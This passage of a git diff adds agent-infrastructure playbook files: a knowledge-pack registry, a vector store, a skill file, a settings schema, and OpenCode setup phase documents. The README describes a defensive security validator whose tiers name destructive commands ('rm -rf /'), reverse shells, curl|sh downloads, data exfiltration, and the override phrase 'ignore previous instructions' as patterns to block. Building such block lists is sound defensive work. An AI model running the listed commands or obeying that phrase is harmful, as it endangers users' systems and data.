+  generateEmbeddings,
+  cosineSimilarity,
+};
diff --git a/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/assets/lib/registry.ts b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/assets/lib/registry.ts
new file mode 100644
index 0000000..279e1d4
--- /dev/null
+++ b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/assets/lib/registry.ts
@@ -0,0 +1,114 @@
+/**
+ * Knowledge Pack Registry
+ *
+ * Manages registration and discovery of installed knowledge packs.
+ */
+
+interface KnowledgePack {
+  id: string;
+  name: string;
+  version: string;
+  installed: string;
+  sources: Array<{
+    path: string;
+    type: 'file' | 'directory' | 'embedded';
+  }>;
+  skillPath?: string;
+  metadata?: Record<string, unknown>;
+}
+
+interface RegistryConfig {
+  configPath: string;
+}
+
+/**
+ * Singleton registry for knowledge packs
+ */
+export class Registry {
+  private static instance: Registry;
+  private packs: Map<string, KnowledgePack> = new Map();
+  private configPath: string;
+
+  private constructor(config: RegistryConfig) {
+    this.configPath = config.configPath;
+  }
+
+  /**
+   * Get the singleton instance
+   */
+  static getInstance(config?: RegistryConfig): Registry {
+    if (!Registry.instance) {
+      Registry.instance = new Registry(config || {
+        configPath: '.claude/config/knowledge-packs.yaml'
+      });
+    }
+    return Registry.instance;
+  }
+
+  /**
+   * Register a new knowledge pack
+   */
+  register(pack: KnowledgePack): void {
+    this.packs.set(pack.id, pack);
+    this.persist();
+  }
+
+  /**
+   * Unregister a knowledge pack
+   */
+  unregister(packId: string): boolean {
+    const result = this.packs.delete(packId);
+    if (result) {
+      this.persist();
+    }
+    return result;
+  }
+
+  /**
+   * Get a specific pack by ID
+   */
+  getPack(packId: string): KnowledgePack | undefined {
+    return this.packs.get(packId);
+  }
+
+  /**
+   * Get all registered packs
+   */
+  getAllPacks(): KnowledgePack[] {
+    return Array.from(this.packs.values());
+  }
+
+  /**
+   * Get active (non-disabled) packs
+   */
+  getActivePacks(): KnowledgePack[] {
+    return this.getAllPacks().filter(
+      pack => pack.metadata?.disabled !== true
+    );
+  }
+
+  /**
+   * Check if a pack is installed
+   */
+  isInstalled(packId: string): boolean {
+    return this.packs.has(packId);
+  }
+
+  /**
+   * Load registry from config file
+   */
+  async load(): Promise<void> {
+    // Implementation would read from YAML config
+    // Placeholder for actual file system operations
+  }
+
+  /**
+   * Persist registry to config file
+   */
+  private persist(): void {
+    // Implementation would write to YAML config
+    // Placeholder for actual file system operations
+  }
+}
+
+export default Registry;
diff --git a/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/assets/lib/vector-store.ts b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/assets/lib/vector-store.ts
new file mode 100644
index 0000000..ec6880b
--- /dev/null
+++ b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/assets/lib/vector-store.ts
@@ -0,0 +1,143 @@
+/**
+ * Vector Store
+ *
+ * In-memory vector storage for semantic search.
+ */
+
+import { cosineSimilarity } from './embeddings';
+
+interface VectorEntry {
+  id: string;
+  content: string;
+  embedding: number[];
+  metadata?: Record<string, unknown>;
+}
+
+interface SearchResult {
+  id: string;
+  content: string;
+  score: number;
+  metadata?: Record<string, unknown>;
+}
+
+interface SearchOptions {
+  limit?: number;
+  minScore?: number;
+  filter?: (entry: VectorEntry) => boolean;
+}
+
+/**
+ * Vector store for a single knowledge pack
+ */
+export class VectorStore {
+  private static stores: Map<string, VectorStore> = new Map();
+
+  private packId: string;
+  private entries: Map<string, VectorEntry> = new Map();
+
+  private constructor(packId: string) {
+    this.packId = packId;
+  }
+
+  /**
+   * Get or create a vector store for a pack
+   */
+  static forPack(packId: string): VectorStore {
+    if (!VectorStore.stores.has(packId)) {
+      VectorStore.stores.set(packId, new VectorStore(packId));
+    }
+    return VectorStore.stores.get(packId)!;
+  }
+
+  /**
+   * Add an entry to the store
+   */
+  add(entry: VectorEntry): void {
+    this.entries.set(entry.id, entry);
+  }
+
+  /**
+   * Add multiple entries
+   */
+  addAll(entries: VectorEntry[]): void {
+    for (const entry of entries) {
+      this.add(entry);
+    }
+  }
+
+  /**
+   * Remove an entry
+   */
+  remove(id: string): boolean {
+    return this.entries.delete(id);
+  }
+
+  /**
+   * Search for similar entries
+   */
+  async search(
+    queryEmbedding: number[],
+    options: SearchOptions = {}
+  ): Promise<SearchResult[]> {
+    const {
+      limit = 10,
minScore = 0.0, + filter, + } = options; + + const results: SearchResult[] = []; + + for (const entry of this.entries.values()) { + // Apply filter if provided + if (filter && !filter(entry)) { + continue; + } + + const score = cosineSimilarity(queryEmbedding, entry.embedding); + + if (score >= minScore) { + results.push({ + id: entry.id, + content: entry.content, + score, + metadata: entry.metadata, + }); + } + } + + // Sort by score descending and limit + return results + .sort((a, b) => b.score - a.score) + .slice(0, limit); + } + + /** + * Get store size + */ + size(): number { + return this.entries.size; + } + + /** + * Clear all entries + */ + clear(): void { + this.entries.clear(); + } + + /** + * Persist store to disk + */ + async persist(path: string): Promise { + // Implementation would serialize and write to disk + } + + /** + * Load store from disk + */ + async load(path: string): Promise { + // Implementation would read and deserialize from disk + } +} + +export default VectorStore; diff --git a/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/assets/templates/skills/Codebase-Expert/SKILL.md b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/assets/templates/skills/Codebase-Expert/SKILL.md new file mode 100644 index 0000000..a49c395 --- /dev/null +++ b/Setup/Claude-Cognitive-Infrastructure/Knowledge-Packs/Codebase-Expert/assets/templates/skills/Codebase-Expert/SKILL.md @@ -0,0 +1,57 @@ +--- +name: Codebase-Expert +version: 1.0.0 +priority: 80 +triggers: + - code + - codebase + - architecture + - implementation + - function + - class + - module + - how does + - where is + - find + - search +context_budget: 8000 +--- + +# Codebase Expert + +## Overview + +Deep expertise in the current codebase, providing semantic search and contextual understanding of code structure, patterns, and implementation details. 
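
The retrieval flow implemented by the `lib/` modules above (embed a query, score indexed snippets by cosine similarity, return the top matches) can be sketched in miniature. This is an illustrative, self-contained stand-in — `topMatches`, the `Snippet` shape, and the toy two-dimensional embeddings are invented for the example, not part of the shipped library:

```typescript
// Score each indexed snippet against the query embedding and
// return the ids of the best matches, highest similarity first.

function cosineSimilarity(a: number[], b: number[]): number {
  let dot = 0, normA = 0, normB = 0;
  for (let i = 0; i < a.length; i++) {
    dot += a[i] * b[i];
    normA += a[i] * a[i];
    normB += b[i] * b[i];
  }
  return dot / (Math.sqrt(normA) * Math.sqrt(normB));
}

interface Snippet { id: string; embedding: number[]; }

function topMatches(query: number[], snippets: Snippet[], limit = 3): string[] {
  return snippets
    .map(s => ({ id: s.id, score: cosineSimilarity(query, s.embedding) }))
    .sort((a, b) => b.score - a.score)
    .slice(0, limit)
    .map(r => r.id);
}

// Toy 2-d embeddings: "auth.ts" points roughly the same way as the query.
const hits = topMatches([1, 0], [
  { id: "auth.ts", embedding: [0.9, 0.1] },
  { id: "readme.md", embedding: [0, 1] },
], 1);
console.log(hits); // ["auth.ts"]
```

The real pipeline swaps the toy vectors for `generateEmbedding` output and keeps entries in `VectorStore`, but the ranking step is exactly this.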
+ +## Capabilities + +### Code Search +- Semantic search across all indexed files +- Find functions, classes, and modules by description +- Locate implementations of specific features + +### Architecture Understanding +- Directory structure and organization +- Module relationships and dependencies +- Entry points and exports + +### Pattern Recognition +- Common patterns used in the codebase +- Coding conventions and standards +- Architectural decisions + +## Usage + +This skill automatically activates when you ask about: +- Code structure ("How is the project organized?") +- Implementations ("Where is X implemented?") +- Functionality ("How does Y work?") +- Finding code ("Find the function that does Z") + +## Context Injection + +When active, relevant code snippets are automatically retrieved and provided as context for more accurate responses. + +--- + +*Codebase Expert Skill v1.0.0* diff --git a/Setup/Claude-Cognitive-Infrastructure/README.md b/Setup/Claude-Cognitive-Infrastructure/README.md new file mode 100644 index 0000000..352af7d --- /dev/null +++ b/Setup/Claude-Cognitive-Infrastructure/README.md @@ -0,0 +1,212 @@ +# Claude Cognitive Infrastructure Setup + +Deploys the complete Claude Cognitive Infrastructure to any agent directory, enabling persistent memory, modular skills, context management, and event-driven hooks. 
+ +## What This Playbook Does + +This playbook creates the foundational `.claude/` directory structure that gives Claude-based agents their cognitive capabilities: + +- **Hook System** - Event-driven automation with security validation, session management, and event logging +- **Memory System** - Three-tier persistent knowledge (hot/warm/cold) for session history, learnings, and state +- **Skills Framework** - Modular domain expertise with tiered loading and USE WHEN activation +- **Configuration** - Settings and config files for customization + +## Infrastructure Structure + +After running this playbook, the agent will have: + +``` +Agent Directory/ +├── CLAUDE.md # Agent identity (single source of truth) +└── .claude/ + ├── settings.json # Hook configuration + ├── VERSION # Infrastructure version tracking + ├── config/ + │ └── config.yaml # Runtime settings + ├── skills/ + │ ├── CORE/ + │ │ ├── SKILL.md # Core identity skill + │ │ ├── SYSTEM/ # System documentation + │ │ │ ├── SKILLSYSTEM.md + │ │ │ ├── MEMORYSYSTEM.md + │ │ │ └── HOOKSYSTEM.md + │ │ ├── USER/ # Personal configuration + │ │ └── Workflows/ # Core workflows + │ └── CreateSkill/ + │ └── SKILL.md # Skill creation skill + ├── MEMORY/ + │ ├── README.md # Memory system docs + │ ├── State/ # Operational state + │ ├── Signals/ # Pattern detection + │ ├── Work/ # Per-task memory + │ ├── Learning/ # Phase-based learnings + │ │ ├── OBSERVE/ + │ │ ├── THINK/ + │ │ ├── PLAN/ + │ │ ├── BUILD/ + │ │ ├── EXECUTE/ + │ │ └── VERIFY/ + │ ├── research/ # Research outputs + │ ├── sessions/ # Session summaries + │ ├── learnings/ # Learning moments + │ ├── decisions/ # ADRs + │ ├── execution/ # Task logs + │ ├── security/ # Security events + │ ├── recovery/ # Recovery snapshots + │ ├── raw-outputs/ # JSONL event streams + │ └── backups/ # Pre-change backups + ├── hooks/ + │ ├── security-validator.ts # 10-tier attack pattern blocking + │ ├── initialize-session.ts # Session start handler + │ ├── load-core-context.ts # 
Context loader + │ ├── event-logger.ts # PostToolUse logger + │ └── session-summary.ts # Session end handler + ├── agents/ # Orchestration worker definitions + ├── scripts/ # Utility scripts + └── examples/ # Reference examples +``` + +## Hook System Features + +The playbook installs a complete hook system with: + +| Hook | Event | Purpose | +|------|-------|---------| +| `security-validator.ts` | PreToolUse (Bash) | 10-tier attack pattern blocking | +| `initialize-session.ts` | SessionStart | Session state initialization | +| `load-core-context.ts` | SessionStart | Load CORE skill context | +| `event-logger.ts` | PostToolUse | Log tool executions to MEMORY | +| `session-summary.ts` | Stop | Capture session summary | + +### Security Validator Tiers + +1. **Catastrophic** - `rm -rf /`, disk destruction (BLOCK) +2. **Reverse Shells** - Bash/netcat/socket shells (BLOCK) +3. **Credential Theft** - curl|sh, wget|sh patterns (BLOCK) +4. **Prompt Injection** - "ignore previous instructions" (BLOCK) +5. **Environment Manipulation** - API key exposure (WARN) +6. **Git Dangerous** - force push, hard reset (WARN) +7. **System Modification** - chmod 777, sudo (LOG) +8. **Network Operations** - ssh, scp, rsync (LOG) +9. **Data Exfiltration** - upload patterns (BLOCK) +10. **Infrastructure Protection** - rm .claude (BLOCK) + +## Memory System Features + +Three-tier memory architecture: + +| Tier | Temperature | Purpose | Location | +|------|-------------|---------|----------| +| **CAPTURE** | Hot | Active work items | `MEMORY/Work/` | +| **SYNTHESIS** | Warm | Phase-based learnings | `MEMORY/Learning/` | +| **APPLICATION** | Cold | Historical archive | `MEMORY/sessions/`, etc. 
| + +## Skills System Features + +- **YAML Frontmatter** with `USE WHEN` activation triggers +- **TitleCase naming** convention +- **Tiered loading** - frontmatter at startup, full body on invocation +- **Workflow routing** tables for multi-step procedures +- **CreateSkill** skill for generating new skills + +## Prerequisites + +- An agent directory where you want to install the infrastructure +- The agent should have a clear purpose/role (used to generate identity) +- **Bun runtime** (for TypeScript hooks) - https://bun.sh + +## Usage + +Run this playbook in the target agent's directory. The playbook will: + +1. Analyze the agent's purpose from directory name and any existing files +2. Generate appropriate agent identity (name, mission, role) +3. Create the complete `.claude/` directory structure +4. Install the Hook System with security validator +5. Initialize the Memory System with three-tier architecture +6. Create the Skills Framework with CORE and CreateSkill +7. Verify the installation + +## After Installation + +Once the infrastructure is installed, you can: + +1. Run **Knowledge Pack** playbooks to add domain expertise +2. Customize the CLAUDE.md with additional instructions +3. Add custom hooks for automation +4. Create new skills using the CreateSkill skill +5. Start using the agent with full cognitive capabilities + +## Git Configuration + +### What to Commit + +| Directory | Commit? 
| Reason | +|-----------|---------|--------| +| `.claude/settings.json` | Yes | Hook configuration | +| `.claude/VERSION` | Yes | Infrastructure version | +| `.claude/config/` | Yes | Runtime settings | +| `.claude/skills/` | Yes | Skill definitions | +| `.claude/skills/CORE/USER/` | No | Personal configuration | +| `.claude/MEMORY/State/` | No | Session state | +| `.claude/MEMORY/Signals/` | No | Pattern detection | +| `.claude/MEMORY/Work/` | No | Active work items | +| `.claude/MEMORY/raw-outputs/` | No | Event logs | +| `.claude/MEMORY/sessions/` | No | Session history | +| `.claude/MEMORY/security/` | No | Security events | +| `.claude/hooks/` | Yes | Event hooks | +| `CLAUDE.md` | Yes | Agent identity | + +### Recommended .gitignore + +```gitignore +# Claude Cognitive Infrastructure - Private Data +.claude/MEMORY/raw-outputs/ +.claude/MEMORY/sessions/ +.claude/MEMORY/security/ +.claude/MEMORY/State/ +.claude/MEMORY/Signals/ +.claude/MEMORY/Work/ +.claude/skills/CORE/USER/ + +# Keep structure but ignore contents +!.claude/MEMORY/.gitkeep +!.claude/MEMORY/State/.gitkeep +``` + +## Version Migration + +### Upgrading Infrastructure + +1. **Check current version**: Read `.claude/VERSION` +2. **Backup existing**: `cp -r .claude .claude.backup` +3. **Run upgrade playbook**: Future versions will include migration scripts +4. **Verify**: Run the 5_VERIFY phase to confirm upgrade success + +### Version History + +| Version | Changes | +|---------|---------| +| 1.1.0 | Initial release with hook system, memory system, skills framework | + +## Version + +Current infrastructure version: **1.1.0** + +## Assets + +This playbook includes the following assets in the `assets/` folder: + +| Asset | Purpose | +|-------|---------| +| `settings.schema.json` | JSON schema for validating `.claude/settings.json` | + +Reference assets using `{{AUTORUN_FOLDER}}/assets/` in playbook documents. 
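
The hook definition in `settings.schema.json` can also be enforced in code. The sketch below is illustrative, not part of the playbook's tooling: `isValidHook` is a hypothetical helper that mirrors the schema's constraints (`type` is required and must be `command` or `script`; `timeout`, when present, must be a non-negative number):

```typescript
// Structural check mirroring the "hook" definition in settings.schema.json.
interface Hook {
  type: "command" | "script";
  command?: string;
  script?: string;
  timeout?: number;
  tools?: string[];
}

function isValidHook(value: unknown): value is Hook {
  if (typeof value !== "object" || value === null) return false;
  const hook = value as Record<string, unknown>;
  // "type" is required and limited to the schema's enum.
  if (hook.type !== "command" && hook.type !== "script") return false;
  // "timeout" is optional, but must be a number >= 0 when present.
  if (hook.timeout !== undefined &&
      (typeof hook.timeout !== "number" || hook.timeout < 0)) return false;
  return true;
}

console.log(isValidHook({ type: "command", command: "bun run hook.ts" })); // true
console.log(isValidHook({ type: "cron" })); // false: not in the enum
```

For full-fidelity validation (required fields, defaults, `additionalProperties`), running the schema through a standard JSON Schema validator is the more complete option.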
+ +## Credits + +The Claude Cognitive Infrastructure was influenced by [Daniel Miessler's](https://danielmiessler.com/) [Personal AI Infrastructure](https://github.com/danielmiessler/Personal_AI_Infrastructure) project, which pioneered many of the concepts around persistent memory, modular skills, and structured context for AI assistants. + +--- + +*Claude Cognitive Infrastructure Setup Playbook* diff --git a/Setup/Claude-Cognitive-Infrastructure/assets/settings.schema.json b/Setup/Claude-Cognitive-Infrastructure/assets/settings.schema.json new file mode 100644 index 0000000..0b8fd12 --- /dev/null +++ b/Setup/Claude-Cognitive-Infrastructure/assets/settings.schema.json @@ -0,0 +1,97 @@ +{ + "$schema": "http://json-schema.org/draft-07/schema#", + "$id": "https://github.com/pedramamini/Maestro-Playbooks/Setup/Claude-Cognitive-Infrastructure/schemas/settings.schema.json", + "title": "Claude Code Settings", + "description": "Configuration schema for Claude Code settings.json", + "type": "object", + "properties": { + "hooks": { + "type": "object", + "description": "Hook configurations for various triggers", + "properties": { + "preToolCall": { + "type": "array", + "description": "Hooks that run before tool calls", + "items": { + "$ref": "#/definitions/hook" + } + }, + "postToolCall": { + "type": "array", + "description": "Hooks that run after tool calls", + "items": { + "$ref": "#/definitions/hook" + } + }, + "onError": { + "type": "array", + "description": "Hooks that run when errors occur", + "items": { + "$ref": "#/definitions/hook" + } + } + }, + "additionalProperties": { + "type": "array", + "items": { + "$ref": "#/definitions/hook" + } + } + }, + "permissions": { + "type": "object", + "description": "Permission settings", + "properties": { + "allow": { + "type": "array", + "description": "Allowed operations or paths", + "items": { + "type": "string" + } + }, + "deny": { + "type": "array", + "description": "Denied operations or paths", + "items": { + "type": 
"string" + } + } + } + } + }, + "definitions": { + "hook": { + "type": "object", + "properties": { + "type": { + "type": "string", + "description": "Type of hook (command or script)", + "enum": ["command", "script"] + }, + "command": { + "type": "string", + "description": "Command to execute (for command type)" + }, + "script": { + "type": "string", + "description": "Path to script file (for script type)" + }, + "timeout": { + "type": "integer", + "description": "Timeout in milliseconds", + "minimum": 0, + "default": 30000 + }, + "tools": { + "type": "array", + "description": "Tools this hook applies to (empty = all tools)", + "items": { + "type": "string" + } + } + }, + "required": ["type"] + } + }, + "additionalProperties": true +} diff --git a/Setup/OpenCode-Cognitive-Infrastructure/0_INITIALIZE.md b/Setup/OpenCode-Cognitive-Infrastructure/0_INITIALIZE.md new file mode 100644 index 0000000..3715ff5 --- /dev/null +++ b/Setup/OpenCode-Cognitive-Infrastructure/0_INITIALIZE.md @@ -0,0 +1,96 @@ +# Phase 0: Initialize + +## Objective + +Validate prerequisites and prepare for OpenCode Cognitive Infrastructure deployment. + +## Prerequisites Checklist + +### 1. Target Directory + +Verify the target agent directory: + +- [ ] Agent directory exists and is writable +- [ ] Directory has a clear name indicating agent purpose +- [ ] No critical files will be overwritten (or backup is acceptable) + +### 2. Existing Infrastructure Check + +Check for existing `.opencode/` directory: + +- [ ] If `.opencode/` exists, determine upgrade vs fresh install +- [ ] If upgrading, backup existing memory files +- [ ] Note any custom configurations to preserve + +### 3. Agent Context + +Gather information about the agent: + +- [ ] Agent name (from directory name) +- [ ] Organization (from parent directory, if applicable) +- [ ] Agent type/role (inferred from name or existing files) + +### 4. 
Runtime Requirements + +Verify required tools are installed: + +- [ ] Node.js (v18+) or Bun runtime +- [ ] OpenCode CLI installed (`opencode --version`) +- [ ] npm available for plugin dependencies + +## Agent Type Detection + +Based on directory name, detect agent type for customization: + +| Keywords in Name | Agent Type | Persona Suggestion | +|------------------|------------|-------------------| +| Sales, Lead, Pipeline | Sales | Scout | +| Engineer, Architect, Developer | Technical | Archon | +| Research, Analysis | Research | Sage | +| Marketing, Content | Marketing | Maven | +| Fundraising, Investor | Finance | Catalyst | +| Operations, Admin | Operations | Atlas | +| People, Recruiting, HR | People | Harbor | +| Executive, Chief | Executive | Aria | +| Brand, Communications | Communications | Echo | +| Strategy, Planning | Strategy | Compass | +| Customer, Success | Customer | Bridge | +| UX, Design | Design | Pixel | + +## Validation Steps + +1. Confirm agent directory path +2. Check write permissions +3. Detect agent type from name +4. Check for existing infrastructure +5. Verify OpenCode is installed +6. 
Determine installation mode (fresh/upgrade) + +## Installation Modes + +### Fresh Install +- Create complete `.opencode/` structure +- Generate new AGENTS.md identity +- Initialize empty memory files +- Install plugin dependencies + +### Upgrade Install +- Preserve existing memory files +- Update structure to latest version +- Add new capabilities (plugins, skills) +- Migrate configuration format if needed + +## OpenCode vs Claude Code Directory Mapping + +| Claude Code | OpenCode | Notes | +|-------------|----------|-------| +| `.claude/` | `.opencode/` | Primary config directory | +| `.claude/settings.json` | `opencode.json` | Root-level config | +| `.claude/hooks/` | `.opencode/plugin/` | Event handlers | +| `.claude/skills/` | `.opencode/skill/` | Skill definitions | +| `.claude/MEMORY/` | `.opencode/memory/` | Persistent storage | +| `CLAUDE.md` | `AGENTS.md` | Agent identity | + +## Next Phase + +Once prerequisites are validated, proceed to **1_ANALYZE.md** to analyze the agent context. diff --git a/Setup/OpenCode-Cognitive-Infrastructure/1_ANALYZE.md b/Setup/OpenCode-Cognitive-Infrastructure/1_ANALYZE.md new file mode 100644 index 0000000..9abb8d0 --- /dev/null +++ b/Setup/OpenCode-Cognitive-Infrastructure/1_ANALYZE.md @@ -0,0 +1,129 @@ +# Phase 1: Analyze Agent Context + +## Objective + +Analyze the target agent's context to determine appropriate identity, skills, and configuration. + +## Analysis Tasks + +### 1. Directory Analysis + +Examine the agent directory: + +- [ ] Read directory name for agent purpose +- [ ] Check parent directory for organization context +- [ ] Look for existing ROLE.md or similar documentation +- [ ] Identify any existing configuration files +- [ ] Check for existing `opencode.json` or `AGENTS.md` + +### 2. 
Agent Identity Derivation + +From the directory name, derive: + +| Component | Source | Example | +|-----------|--------|---------| +| Agent Name | Directory name | "Sales Lead Agent" | +| Organization | Parent directory | "Wayward Guardian" | +| Persona Name | Generated from type | "Scout" | +| Agent Type | Keywords in name | "Sales" | + +### 3. Role Detection + +If ROLE.md or AGENTS.md exists, extract: + +- Role description (first paragraph after title) +- Key responsibilities (bulleted lists) +- Domain expertise areas +- Integration points with other agents + +### 4. Existing Files Inventory + +Check for files that inform configuration: + +| File | Purpose | Action | +|------|---------|--------| +| ROLE.md | Role definition | Extract responsibilities | +| AGENTS.md | Existing identity | Plan upgrade | +| README.md | Documentation | Extract context | +| opencode.json | Existing config | Preserve settings | +| .opencode/ | Existing infrastructure | Plan upgrade | +| auto-run/ | Playbooks | Note for integration | + +## Agent Profile Template + +Based on analysis, build agent profile: + +```yaml +agent: + name: "" + persona: "" + organization: "" + type: "" + +identity: + mission: "" + role: "<2-3 sentence role description>" + +capabilities: + primary: [] # Core responsibilities + secondary: [] # Supporting tasks + +integrations: + collaborates_with: [] # Other agents + tools: [] # External tools + mcp_servers: [] # MCP integrations +``` + +## Analysis Outputs + +Document the following for use in later phases: + +1. **Agent Profile** - Complete identity information +2. **Installation Mode** - Fresh or upgrade +3. **Customizations Needed** - Based on agent type +4. 
**Preservation List** - Files to keep if upgrading + +## Type-Specific Considerations + +### Technical Agents +- Include architecture context directories +- Add development and testing contexts +- Consider code-related plugins +- Enable GitHub integration + +### Business Agents +- Include projects context +- Add working context for active tasks +- Consider CRM/pipeline integrations +- Enable MCP servers for external tools + +### Research Agents +- Emphasize knowledge context +- Add research methodology +- Consider web search capabilities +- Enable documentation MCP servers + +### Operations Agents +- Include process documentation +- Add tracking and reporting +- Consider scheduling integrations +- Enable notification plugins + +## OpenCode-Specific Considerations + +### Built-in Agents +OpenCode includes two built-in agents: +- **build** (default) - Full access agent for development work +- **plan** - Read-only agent for analysis and code exploration + +Consider how your custom agent complements these. + +### MCP Server Discovery +Check for commonly used MCP servers: +- Context7 for documentation search +- Database connectors +- API integrations + +## Next Phase + +Proceed to **2_PLAN_STRUCTURE.md** to plan the infrastructure structure. diff --git a/Setup/OpenCode-Cognitive-Infrastructure/2_PLAN_STRUCTURE.md b/Setup/OpenCode-Cognitive-Infrastructure/2_PLAN_STRUCTURE.md new file mode 100644 index 0000000..4ce9ee9 --- /dev/null +++ b/Setup/OpenCode-Cognitive-Infrastructure/2_PLAN_STRUCTURE.md @@ -0,0 +1,227 @@ +# Phase 2: Plan Structure + +## Objective + +Plan the complete OpenCode Cognitive Infrastructure directory structure for the agent. 
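
The layout planned below lends itself to scripted creation. As a minimal sketch (Node/Bun `fs`; `scaffoldMemory` and the directory list are taken from this plan, not from shipped tooling):

```typescript
import { mkdirSync } from "fs";
import { tmpdir } from "os";
import { join } from "path";

// Memory subdirectories from the planned .opencode/memory/ tree.
const MEMORY_DIRS = [
  "state", "signals", "work",
  "learning/observe", "learning/think", "learning/plan",
  "learning/build", "learning/execute", "learning/verify",
  "research", "sessions", "learnings", "decisions",
  "execution", "security", "recovery", "raw-outputs", "backups",
];

// Create the memory hierarchy under a given agent root and
// return the absolute paths that were created.
function scaffoldMemory(root: string): string[] {
  return MEMORY_DIRS.map(dir => {
    const full = join(root, ".opencode", "memory", dir);
    mkdirSync(full, { recursive: true }); // no-op if it already exists
    return full;
  });
}

const created = scaffoldMemory(join(tmpdir(), "demo-agent"));
console.log(created.length); // 18
```

Because `mkdirSync` with `recursive: true` is idempotent, the same scaffold can run safely in both fresh-install and upgrade modes.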
+
+## Core Directory Structure
+
+```
+<Agent Directory>/
+├── AGENTS.md                      # Agent identity file
+├── opencode.json                  # Main configuration
+└── .opencode/
+    ├── VERSION                    # Infrastructure version (1.0.0)
+    ├── config/
+    │   └── config.yaml            # Runtime configuration
+    ├── skill/
+    │   ├── core/
+    │   │   └── SKILL.md           # Core agent skill
+    │   └── create-skill/
+    │       └── SKILL.md           # Skill creation skill
+    ├── plugin/
+    │   ├── security-validator.ts  # Security hook
+    │   ├── session-manager.ts     # Session lifecycle
+    │   ├── event-logger.ts        # Event logging
+    │   └── context-loader.ts      # Context loading
+    ├── memory/
+    │   ├── README.md              # Memory system docs
+    │   ├── state/
+    │   │   └── active-work.json   # Current work state
+    │   ├── signals/
+    │   │   └── README.md          # Signal detection
+    │   ├── work/                  # Per-task memory
+    │   ├── learning/
+    │   │   ├── observe/
+    │   │   ├── think/
+    │   │   ├── plan/
+    │   │   ├── build/
+    │   │   ├── execute/
+    │   │   └── verify/
+    │   ├── research/              # Research outputs
+    │   ├── sessions/              # Session summaries
+    │   ├── learnings/             # Learning moments
+    │   ├── decisions/             # ADRs
+    │   ├── execution/             # Task logs
+    │   ├── security/              # Security events
+    │   ├── recovery/              # Recovery snapshots
+    │   ├── raw-outputs/           # JSONL event streams
+    │   └── backups/               # Pre-change backups
+    ├── command/
+    │   └── README.md              # Custom commands
+    ├── agents/
+    │   └── README.md              # Custom agent definitions
+    └── docs/
+        ├── SKILLSYSTEM.md         # Skill system docs
+        ├── MEMORYSYSTEM.md        # Memory system docs
+        └── PLUGINSYSTEM.md        # Plugin system docs
+```
+
+## File Contents Plan
+
+### AGENTS.md (Root Identity)
+
+```markdown
+# <Agent Name>: <Persona>
+
+## Your Name
+Your name is **<Persona>**. You are the <agent type> for <organization>.
+
+## Your Mission
+<One-sentence mission statement>
+
+## Your Role
+<2-3 sentence role description>
+
+## Core Responsibilities
+<Bulleted list of core responsibilities>
+
+## Memory Management
+**CRITICAL:** Update work state after EVERY conversation turn.
+ +## Organization Context + +``` + +### opencode.json + +```json +{ + "$schema": "https://opencode.ai/config.json", + "plugins": { + "security-validator": { + "enabled": true + }, + "session-manager": { + "enabled": true + }, + "event-logger": { + "enabled": true + }, + "context-loader": { + "enabled": true + } + }, + "skill": { + "allow": ["*"], + "deny": [] + }, + "agents": { + "build": { + "model": "anthropic:claude-sonnet-4-20250514" + }, + "plan": { + "model": "anthropic:claude-sonnet-4-20250514" + } + } +} +``` + +### VERSION + +``` +1.0.0 +``` + +### config/config.yaml + +```yaml +version: "1.0.0" +agent: + name: "" + persona: "" + type: "" +settings: + memory_update_frequency: "every_turn" + context_loading: "progressive" +``` + +### skill/core/SKILL.md + +```markdown +--- +name: core +description: Core identity and configuration. Provides agent identity, capabilities overview, and operating principles. USE WHEN session begins OR user asks about identity, capabilities, or how the agent works. +--- + +# Core - Agent Identity + +**Auto-loads at session start.** This skill defines agent identity and core operating principles. + +## Identity + +**Agent:** +**Role:** +**Organization:** + +## Available Capabilities + +- **Memory System**: Persistent knowledge across sessions +- **Skills Framework**: Modular domain expertise +- **Plugin System**: Event-driven automation +- **MCP Integration**: External tool access + +## Quick Reference + +- Skills directory: `.opencode/skill/` +- Memory directory: `.opencode/memory/` +- Configuration: `opencode.json` +``` + +### Memory Files + +**memory/README.md:** +```markdown +# Memory System + +Persistent memory architecture for session history, learnings, and operational state. 
+
+## Directory Structure
+
+| Directory | Purpose | Retention |
+|-----------|---------|-----------|
+| `research/` | Deep research outputs | Permanent |
+| `sessions/` | Session summaries | Rolling 90 days |
+| `learnings/` | Learning moments | Permanent |
+| `decisions/` | Architectural Decision Records | Permanent |
+| `execution/` | Task execution logs | Rolling 30 days |
+| `security/` | Security event logs | Permanent |
+| `recovery/` | Recovery snapshots | Rolling 7 days |
+| `raw-outputs/` | JSONL event streams | Rolling 7 days |
+| `backups/` | Pre-refactoring backups | As needed |
+| `state/` | Current operational state | Active |
+| `signals/` | Pattern detection | Active |
+| `work/` | Per-task memory | Active |
+| `learning/` | Phase-based learnings | Permanent |
+```
+
+**memory/state/active-work.json:**
+```json
+{
+  "current_task": null,
+  "started_at": null,
+  "status": "idle"
+}
+```
+
+## Context Placeholder Files
+
+Each context subdirectory gets a README.md placeholder:
+
+```markdown
+# <Context Name>
+
+This directory contains <context type> information.
+
+## Contents
+
+<What belongs in this directory>
+
+## Usage
+
+<How and when the agent should use it>
+```
+
+## Next Phase
+
+Proceed to **3_EVALUATE.md** to evaluate the planned structure.
diff --git a/Setup/OpenCode-Cognitive-Infrastructure/3_EVALUATE.md b/Setup/OpenCode-Cognitive-Infrastructure/3_EVALUATE.md
new file mode 100644
index 0000000..c241ce4
--- /dev/null
+++ b/Setup/OpenCode-Cognitive-Infrastructure/3_EVALUATE.md
@@ -0,0 +1,124 @@
+# Phase 3: Evaluate Plan
+
+## Objective
+
+Evaluate the infrastructure plan for completeness, correctness, and safety.
+
+## Evaluation Checklist
+
+### 1. Identity Completeness
+
+- [ ] Agent name is clear and descriptive
+- [ ] Persona name is short and memorable
+- [ ] Mission statement is concise (one sentence)
+- [ ] Role description explains purpose (2-3 sentences)
+- [ ] Responsibilities are specific and actionable
+
+### 2. 
